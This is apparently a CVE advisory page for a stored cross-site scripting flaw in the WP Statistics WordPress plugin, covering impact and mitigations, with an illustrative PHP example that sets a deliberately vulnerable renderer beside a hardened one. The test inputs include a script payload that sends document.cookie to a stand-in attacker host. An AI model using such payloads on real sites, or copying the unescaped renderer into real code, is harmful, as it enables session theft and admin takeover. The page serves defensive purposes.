CVE-2022-25305
Published: 24 February 2022
Summary
CVE-2022-25305 is a high-severity Cross-site Scripting (CWE-79) vulnerability in the VeronaLabs WP Statistics WordPress plugin. Its CVSS base score is 7.2 (High).
Operationally, it ranks in the top 7.8% of CVEs by exploit likelihood (EPSS); it is not currently listed in the CISA KEV catalog, and a public proof-of-concept is referenced.
Deeper analysis
The WP Statistics WordPress plugin is vulnerable to stored cross-site scripting in versions up to and including 13.1.5. The flaw is caused by insufficient escaping and sanitization of the IP parameter handled in the includes/class-wp-statistics-ip.php file: a value that is not a valid IP address is accepted, persisted, and later written into several admin pages without output encoding, so arbitrary web script executes when an administrator views the site statistics. The issue is tracked as CWE-79 and carries a CVSS 3.1 score of 7.2.
An unauthenticated attacker can supply a crafted IP value over the network; no login is needed to plant the payload, and the only user interaction required is an administrator opening the statistics pages. The injected script then runs in the administrator's browser context with the administrator's privileges. Because it executes inside the WordPress admin, it can read the page's nonces and issue authenticated requests, so the usual CSRF protections do not stop it; practical consequences include session hijacking, creation of additional administrator accounts, and unauthorized configuration changes.
Public references include a Wordfence vulnerability advisory and WordPress plugin repository changesets that document the corrective commit; administrators should update to a release newer than 13.1.5 to remove the vulnerable code path. The associated EPSS score has remained flat at 0.0788 since disclosure, with no observed upward trajectory.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2022-29989
Vulnerability details
The WP Statistics WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the IP parameter found in the ~/includes/class-wp-statistics-ip.php file, which allows attackers to inject arbitrary web scripts onto several pages that execute when site administrators view a site's statistics, in versions up to and including 13.1.5.
- CWE(s): CWE-79 (Improper Neutralization of Input During Web Page Generation, "Cross-site Scripting")
Related Threats
No named actor attribution yet. ATT&CK technique mapping in progress for this CVE.
Affected Assets
- WP Statistics WordPress plugin (VeronaLabs), versions up to and including 13.1.5
Mitigating Controls
Likely Mitigating Controls (AI-derived)
Per-CVE control mapping for this CVE has not run yet; the list below is derived from the weakness types (CWEs) cited in the NVD entry.
- Penetration testing: submit XSS payloads through every client-controlled input, including proxy and forwarding headers that feed "visitor IP" fields, and verify whether they are later rendered unencoded in admin views.
- Input validation: accept an IP field only if it parses as a syntactically valid IPv4 or IPv6 address and reject everything else, rather than trying to strip script-like content from free-form strings.
- Output encoding: HTML-encode every stored value at the point it is written into a page, using an encoder appropriate to the context (text, attribute, URL, JavaScript). In WordPress this means the esc_html()/esc_attr() family; encoding on output removes XSS exploitability even if validation is bypassed.
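The pattern described in the Deeper analysis and the two controls listed above (validate on input, encode on output), as an added example; this is illustrative PHP written for this page, not the WP Statistics plugin's own code. It assumes, hypothetically, that the client-supplied value arrives in a variable $client_ip and is rendered into a table cell of a statistics page; esc_html() is WordPress-only, so a minimal equivalent built on htmlspecialchars() stands in for it.

```php
<?php
// Added example, not the WP Statistics plugin's own code.
// A client-controlled "IP" string is stored and later echoed into an admin
// page. The vulnerable renderer trusts the string; the hardened path validates
// it as an IP address on the way in and HTML-encodes it on the way out.
//
// Assumptions (hypothetical): the value comes from a proxy header into
// $client_ip and is rendered into a <td> of a statistics table.

declare(strict_types=1);

// Stand-in for WordPress's esc_html(): encode for an HTML text context.
function html_escape(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Input validation: accept only a syntactically valid IPv4/IPv6 address.
// Returns null for anything else, including script payloads.
function validate_ip(string $candidate): ?string {
    $valid = filter_var(trim($candidate), FILTER_VALIDATE_IP);
    return $valid === false ? null : $valid;
}

// VULNERABLE: the stored value is interpolated into markup unescaped.
function render_row_vulnerable(string $stored_ip, int $hits): string {
    return "<tr><td>{$stored_ip}</td><td>{$hits}</td></tr>";
}

// HARDENED, step 1: refuse to store anything that is not an IP address.
// '0.0.0.0' is an arbitrary placeholder for an invalid/absent address.
function store_ip_hardened(string $client_ip): string {
    return validate_ip($client_ip) ?? '0.0.0.0';
}

// HARDENED, step 2: encode on output regardless of what was stored.
function render_row_hardened(string $stored_ip, int $hits): string {
    return '<tr><td>' . html_escape($stored_ip) . '</td><td>' . $hits . '</td></tr>';
}

// Constructed inputs: one benign visitor, one attacker-supplied "IP".
$inputs = [
    '203.0.113.7',
    '<script>document.location="https://attacker.invalid/?c="+document.cookie</script>',
];

foreach ($inputs as $client_ip) {
    echo "input:      ", $client_ip, PHP_EOL;
    echo "vulnerable: ", render_row_vulnerable($client_ip, 1), PHP_EOL;
    $stored = store_ip_hardened($client_ip);
    echo "hardened:   ", render_row_hardened($stored, 1), PHP_EOL, PHP_EOL;
}

// Defence in depth: even if a raw string reached the renderer (validation
// bypassed or an older row already in the database), output encoding alone
// turns the payload into inert text.
echo "encoded only: ", render_row_hardened($inputs[1], 1), PHP_EOL;
```

Run it with `php example.php`. The second input prints as a live `<script>` element from the vulnerable renderer, is replaced by the placeholder address by the hardened store, and is rendered as `&lt;script&gt;...` by the hardened renderer. Validation alone is not enough because rows written before the fix remain in the database; encoding at render time is what makes those safe.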